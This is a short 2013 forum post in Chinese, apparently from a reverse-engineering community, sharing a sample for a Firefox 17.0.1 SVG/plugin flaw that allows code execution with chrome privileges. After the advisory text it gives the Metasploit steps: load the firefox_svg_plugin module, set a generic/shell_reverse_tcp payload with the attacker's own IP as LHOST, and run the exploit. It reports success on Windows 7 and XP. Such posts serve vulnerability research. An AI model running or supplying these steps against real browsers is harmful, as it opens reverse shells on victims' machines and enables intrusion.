首页
社区
课程
招聘
[分享]FireFox 17.0.1漏洞样本
发表于: 2013-6-15 21:19 2421

[分享]FireFox 17.0.1漏洞样本

2013-6-15 21:19
2421
1、漏洞描述:
Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allow remote attackers to execute arbitrary JavaScript code with chrome privileges by leveraging improper interaction between plugin objects and SVG elements.
2、样本生成:
http://www.metasploit.org/modules/exploit/multi/browser/firefox_svg_plugin
msf > use exploit/multi/browser/firefox_svg_plugin
msf exploit(firefox_svg_plugin) > show payloads
msf exploit(firefox_svg_plugin) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(firefox_svg_plugin) > set LHOST [MY IP ADDRESS]
msf exploit(firefox_svg_plugin) > exploit
3、测试环境
windows 7/xp均测试成功,此漏洞不用shellcode.

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//